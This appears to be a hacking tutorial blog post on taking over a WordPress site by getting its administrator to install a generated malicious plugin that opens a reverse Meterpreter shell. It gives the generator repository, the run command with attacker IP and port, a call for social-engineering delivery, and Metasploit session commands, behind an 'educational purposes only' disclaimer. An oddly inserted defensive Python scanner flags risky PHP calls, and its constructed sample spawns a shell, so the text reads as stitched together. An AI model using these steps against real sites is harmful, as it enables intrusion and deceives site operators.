Hack WordPress Website with Malicious Plug-in. The threats of unknown plugins from websites and social engineering. Tutorial for educational purposes only

Hack WordPress Website with Malicious Plug-in 2017



In computing, a plug-in (or plugin, add-in, addin, add-on, addon, or extension) is a software component that adds a specific feature to an existing computer program. When a program supports plug-ins, it enables customization. Common examples are the plug-ins used in web browsers to add new features such as search engines, virus scanners, or support for a new file type such as a new video format. Well-known browser plug-ins include the Adobe Flash Player, the QuickTime Player, and the Java plug-in, which can launch a user-activated Java applet on a web page and run it on a local Java virtual machine.

Applications support plug-ins for many reasons. Some of the main reasons include:

  • to enable third-party developers to create abilities which extend an application
  • to support easily adding new features
  • to reduce the size of an application
  • to separate source code from an application because of incompatible software licenses.

Welcome back. Today we will talk about how we could compromise a WordPress website for a reverse Meterpreter shell through the use of a malicious WordPress add-on.

This will allow us to create a malicious WordPress plugin to use as a payload and achieve a reverse shell back to the attacking machine.


Requirements:

  • Linux
  • Python
  • Metasploit
  • malicious-wordpress-plugin

This tutorial is intended to show the threats posed by unknown plugins from rogue websites and by social engineering methods. This tutorial is for educational purposes only; the author of this guide will not be held responsible for misuse of this information.


First we will prepare malicious-wordpress-plugin, the script that generates the malicious WordPress plugin.

DOWNLOAD MALICIOUS-WORDPRESS-PLUGIN GENERATOR

https://github.com/wetw0rk/malicious-wordpress-plugin

Open a new terminal and navigate to the directory containing the malicious-wordpress-plugin script. Listing it shows the contents of the directory, including wordpress_zip_gen.py.

Execute the wordpress_zip_gen.py script with the following command:

python wordpress_zip_gen.py

So that we can establish a reverse connection we first need to know our local IP address. We can find this by typing “ifconfig” in a terminal; the LHOST value is the address listed under inet.

Usage:

python wordpress_zip_gen.py [LHOST] [LPORT]

Example:

python wordpress_zip_gen.py 192.168.43.49 443

wordpress_zip_gen will now generate a malicious WordPress addon and output it to the script directory.

This attack will require a little social engineering/trickery to deliver the payload.

The malicious WordPress plugin can be named whatever you like.

Upload the malicious WordPress plugin to the WordPress test environment and activate the plugin.

After the admin or site operator installs and activates the malicious WordPress plugin, you should now have an established reverse connection back to the attacking machine via a Meterpreter shell.
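From the defender's side, the plugin upload step above is exactly where a review should happen before anything is activated. As an added example (not part of the original tutorial or the malicious-wordpress-plugin project), this Python script unpacks a plugin zip in memory and flags PHP files that call functions commonly used to spawn processes, open outbound sockets or hide code; the sample zip and the list of risky functions are constructed here for illustration.

```python
import io
import re
import zipfile

# PHP functions a typical plugin rarely needs but shell payloads almost always
# use (constructed list; extend it for your own environment).
RISKY_CALLS = (
    "fsockopen", "pfsockopen", "socket_create", "stream_socket_client",
    "shell_exec", "exec", "system", "passthru", "proc_open", "popen",
    "eval", "base64_decode", "gzinflate", "str_rot13", "assert",
)

# Match each name only when it is used as a call: name followed by "(".
CALL_RE = re.compile(
    r"\b(" + "|".join(map(re.escape, RISKY_CALLS)) + r")\s*\(", re.IGNORECASE
)


def scan_plugin_zip(data: bytes) -> dict:
    """Return {path: sorted list of risky function names} for PHP files in a zip."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith((".php", ".phtml", ".inc")):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            hits = {m.group(1).lower() for m in CALL_RE.finditer(text)}
            if hits:
                findings[info.filename] = sorted(hits)
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: one benign plugin file plus one that opens a socket and runs a shell."""
    benign = "<?php\n/* Plugin Name: Hello */\nadd_action('init', function () { echo 'hi'; });\n"
    suspicious = (
        "<?php\n/* Plugin Name: Totally Fine */\n"
        "$s = fsockopen($h, $p);\n"
        "$proc = proc_open('/bin/sh', $desc, $pipes);\n"
        "eval(base64_decode($blob));\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("hello/hello.php", benign)
        zf.writestr("hello/readme.txt", "nothing to see")
        zf.writestr("hello/inc/loader.php", suspicious)
    return buf.getvalue()


if __name__ == "__main__":
    for path, calls in scan_plugin_zip(build_sample_zip()).items():
        print(f"{path}: {', '.join(calls)}")
```

A hit is a reason to read the file, not proof of malice; pair the scan with disabling in-dashboard plugin installs on production sites so uploads go through review first.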

To check whether your shell session has been established, you can list the sessions using the following commands.

Listing sessions:
sessions -l

Connecting to a session:
sessions -i 1

Once a remote connection is established between the WordPress website and the attacking machine, we can use the “help” command to list the available operations. This shows what can be run against the target web server. We have now come to the end of this guide; if you enjoyed this tutorial, consider liking and sharing it on social media. Thanks.
